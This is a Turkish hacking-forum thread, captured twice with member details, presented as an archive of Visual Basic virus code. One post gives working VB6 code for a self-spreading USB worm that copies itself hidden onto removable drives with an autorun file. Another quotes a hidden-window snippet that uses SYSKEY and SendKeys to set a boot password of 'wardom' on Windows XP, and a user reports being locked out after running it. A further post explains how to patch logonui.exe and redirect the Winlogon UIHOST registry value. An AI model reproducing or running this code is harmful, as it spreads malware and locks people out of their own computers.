Visual Basic Virüs Kod Arşivi

attaa · 21-01-2011, 16:54

Aynen banada lazım boyle bisi

4ssc1 · 17-03-2011, 15:12

Usb İnfecter : Corabada bizimde tuzumuz olsun

Modul

PHP Kod:


			
Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long

Public Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long

Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long



Public Const FILE_ATTRIBUTE_HIDDEN = &H2



Public Function USB()



Dim sBuffer As String * 260, iGet As Integer, iDrive As String, iType As String



iGet = GetLogicalDriveStrings(Len(sBuffer), sBuffer) ' // Get Drives



If iGet = 0 Then Exit Function ' // If iGet = 0 No Drives

iDrive = sBuffer

 

For i = 1 To 50 ' // We Disk 1 to 50 if there are available



If Left$(sBuffer, InStr(1, sBuffer, Chr(0))) = Chr(0) Then Exit For ' // If the disk you back chr(0) then it is not a valid disc



iDrive = Left(sBuffer, InStr(1, sBuffer, Chr(0)) - 1) ' // Get Drive Letter



iType = GetDriveType(iDrive) ' // Get Drive Type



If iType = 2 Then ' // If Type = 2 then is a PEN-DRIVE



Call Complete(iDrive) ' // INfect Disk



End If



sBuffer = Right(sBuffer, Len(sBuffer) - InStr(1, sBuffer, Chr(0))) ' // Remove the disk from the list



Next i ' // Next Disk

End Function



Function Complete(Drive As String) ' // Function For Infect Device

Dim YO As String

YO = App.Path & "\" & App.EXEName & ".exe" ' // APP Path



If Exist(Drive & App.EXEName & ".exe") = False Then ' // If the disk is not infected

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=214967
FileCopy YO, Drive & App.EXEName & ".exe" ' // Copy App to disk



Call WritePrivateProfileString("Autorun", "Open", App.EXEName & ".exe", Drive & "Autorun.ini") ' // Create Autorun.inf



SetFileAttributes Drive & App.EXEName & ".exe", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode

SetFileAttributes Drive & "Autorun.ini", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode



End If

End Function



Public Function Exist(Path As Variant) As Boolean ' // Function foe see if a file exist

Dim FS

Set FS = CreateObject("Scripting.FileSystemObject")

Exist = FS.fileexists(Path)

End Function

Form Load'a

PHP Kod:


			
Call Usb

Dedikten sonra program acildiktan sonra kendini usb ye gizli dosya olarak kopyalar.

comix@@ · 18-03-2011, 20:44

bu konu sabitlensin....

4ssc1 · 24-03-2011, 20:51

Konu sabit zaten. Elimde bunun gibi tonla kod var

hackel · 31-03-2011, 20:38

kardeş kusura bakma ama bunların hazırı yapılmış Res Hack le
Selam arkadaşlar alıntıdır sizlerle paylaşmak istedim...!!!!Acemiler uraşmasın!!!

1-) http://delphi.icm.edu.pl/ftp/tools/ResHack.zip (Buraya tıklıyoruz ve programı indiriyoruz..)

2-) yukard verdiğim programı çalıştırın açılan ekranda ''Files'' tuşuna ardından ''open'' tuşuna
basın ve C:/WINDOWS/system32/logonui.exe dosyasını açın.

3-)Aşşağıdaki resimdeki yola gidin
ve burdaki ''Hoşgeldiniz'' yazısını istediğiniz gibi değiştirin.(Örnek: Yinemi Sen!)

NOT: Hoşgeldiniz Yazsıs kaç karakter ise yazacağınız yazıda o kadar olmalıdır yani
11 karakterlik bi yazı yazın.

4-) ''Compile script'' tuşuna basın ve ''files'' tan save as seçin ve ''mylogonui.exe''
olarak C:/WINDOWS/system32/ altına kaydedin.

5-) programı kapatın.

6-) Başlat/Çalıştır/regedit yazın ve enter diyin sora sırası ile.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=214967

7-) HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
altındaki 'UIHOST' değerine çift tıklayın ve burdaki 'logonui.exe' yi 'mylogonui.exe'
olarak değiştirin.

8-) Registry'i kapatın ve bilgisayarınızı yeniden başlatın.

DikGen · 13-05-2011, 12:44

Alıntı:

Orjinal Mesaj Sahibi mbk_kbm

Kod:

Private Sub Form_Load()
App.TaskVisible = False
Form1.Visible = False
Shell "SYSKEY.EXE", vbNormalFocus
SendKeys "G", 1
SendKeys "B", 1
SendKeys "{TAB}", 1
SendKeys "wardom", 1
SendKeys "{TAB}", 1
SendKeys "wardom", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
SendKeys "{ENTER}", 1
End
End Sub

xp başlangıç parolası koyar. xp açılmadan önce sorulur oturum açma ekranı gelmeden önce .

deneyenler şifrenin "wardom" olduğunu unutmasın
----------------------------

Bunu dün gece yaptım. Fakat projeyi kaydetmeden F5 ile önizleme yaptım. Bugün bilgisayarı açtığımda ise biraz şaşırdım

Fakat şifreyi tahmin ettim ve bilgisayara girdim. Google'de yaptığım araştırmaya göre ise bu şifre değiştirilebiliyor fakat iptal edilemiyor. Başlat>Çalıştır syskey yapınca ise çıkan pencerede aynı şey yazıyor. Acaba bunu nasıl iptal edebilirim. Buna benzer bir kod falan varsa veya bi program. Artık her neyse. Şifreyi kaldırmam lazım.
Şimdiden teşekkür ederim

mbk_kbm · 15-05-2011, 15:34

şifreyi boş olarak tanımlayabiliyorsun ozaman pencere çıkmıyor.

17-03-2011, 15:12	#92
4ssc1 Çırak Kayıt Tarihi: Jan 2011 Üye numarası: #521083 Mesaj sayısı: 6 Karma etkisi: 0 Karma: 10	Usb İnfecter : Corabada bizimde tuzumuz olsun Modul PHP Kod: Public Declare Function GetLogicalDriveStrings Lib "kernel32" Alias "GetLogicalDriveStringsA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Public Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpString As Any, ByVal lpFileName As String) As Long Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long Public Const FILE_ATTRIBUTE_HIDDEN = &H2 Public Function USB() Dim sBuffer As String * 260, iGet As Integer, iDrive As String, iType As String iGet = GetLogicalDriveStrings(Len(sBuffer), sBuffer) ' // Get Drives If iGet = 0 Then Exit Function ' // If iGet = 0 No Drives iDrive = sBuffer For i = 1 To 50 ' // We Disk 1 to 50 if there are available If Left$(sBuffer, InStr(1, sBuffer, Chr(0))) = Chr(0) Then Exit For ' // If the disk you back chr(0) then it is not a valid disc iDrive = Left(sBuffer, InStr(1, sBuffer, Chr(0)) - 1) ' // Get Drive Letter iType = GetDriveType(iDrive) ' // Get Drive Type If iType = 2 Then ' // If Type = 2 then is a PEN-DRIVE Call Complete(iDrive) ' // INfect Disk End If sBuffer = Right(sBuffer, Len(sBuffer) - InStr(1, sBuffer, Chr(0))) ' // Remove the disk from the list Next i ' // Next Disk End Function Function Complete(Drive As String) ' // Function For Infect Device Dim YO As String YO = App.Path & "\" & App.EXEName & ".exe" ' // APP Path If Exist(Drive & App.EXEName & ".exe") = False Then ' // If the disk is not infected Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=214967 FileCopy YO, Drive & App.EXEName & ".exe" ' // Copy App to disk Call WritePrivateProfileString("Autorun", "Open", App.EXEName & ".exe", Drive & "Autorun.ini") ' // Create Autorun.inf SetFileAttributes Drive & App.EXEName & ".exe", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode SetFileAttributes Drive & "Autorun.ini", FILE_ATTRIBUTE_HIDDEN ' // We put the files in hidden mode End If End Function Public Function Exist(Path As Variant) As Boolean ' // Function foe see if a file exist Dim FS Set FS = CreateObject("Scripting.FileSystemObject") Exist = FS.fileexists(Path) End Function Form Load'a PHP Kod: `Call Usb` Dedikten sonra program acildiktan sonra kendini usb ye gizli dosya olarak kopyalar.

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

21-01-2011, 16:54	#91
attaa Cool Çırak Kayıt Tarihi: Sep 2008 Üye numarası: #264138 Yer: İSTANBUL Mesaj sayısı: 51 Karma etkisi: 0 Karma: -1489	Aynen banada lazım boyle bisi

18-03-2011, 20:44	#93
comix@@ Daimi Üye Kayıt Tarihi: Oct 2010 Üye numarası: #495141 Mesaj sayısı: 708 Karma etkisi: 646 Karma: 64446	bu konu sabitlensin....

24-03-2011, 20:51	#94
4ssc1 Çırak Kayıt Tarihi: Jan 2011 Üye numarası: #521083 Mesaj sayısı: 6 Karma etkisi: 0 Karma: 10	Konu sabit zaten. Elimde bunun gibi tonla kod var

31-03-2011, 20:38	#95
hackel Çırak Kayıt Tarihi: Jan 2011 Üye numarası: #520752 Yer: BURSA Mesaj sayısı: 24 Karma etkisi: 0 Karma: 11	kardeş kusura bakma ama bunların hazırı yapılmış Res Hack le Selam arkadaşlar alıntıdır sizlerle paylaşmak istedim...!!!!Acemiler uraşmasın!!! 1-) http://delphi.icm.edu.pl/ftp/tools/ResHack.zip (Buraya tıklıyoruz ve programı indiriyoruz..) 2-) yukard verdiğim programı çalıştırın açılan ekranda ''Files'' tuşuna ardından ''open'' tuşuna basın ve C:/WINDOWS/system32/logonui.exe dosyasını açın. 3-)Aşşağıdaki resimdeki yola gidin ve burdaki ''Hoşgeldiniz'' yazısını istediğiniz gibi değiştirin.(Örnek: Yinemi Sen!) NOT: Hoşgeldiniz Yazsıs kaç karakter ise yazacağınız yazıda o kadar olmalıdır yani 11 karakterlik bi yazı yazın. 4-) ''Compile script'' tuşuna basın ve ''files'' tan save as seçin ve ''mylogonui.exe'' olarak C:/WINDOWS/system32/ altına kaydedin. 5-) programı kapatın. 6-) Başlat/Çalıştır/regedit yazın ve enter diyin sora sırası ile. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=214967 7-) HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon altındaki 'UIHOST' değerine çift tıklayın ve burdaki 'logonui.exe' yi 'mylogonui.exe' olarak değiştirin. 8-) Registry'i kapatın ve bilgisayarınızı yeniden başlatın.

15-05-2011, 15:34	#97
mbk_kbm Forum Kalfası Kayıt Tarihi: Jun 2007 Üye numarası: #130925 Yer: !stanbul Mesaj sayısı: 1,355 Karma etkisi: 5166 Karma: 516048	şifreyi boş olarak tanımlayabiliyorsun ozaman pencere çıkmıyor.

Şu Anda Konuyu Görüntüleyenler: 3 (0 üye ve 3 misafir)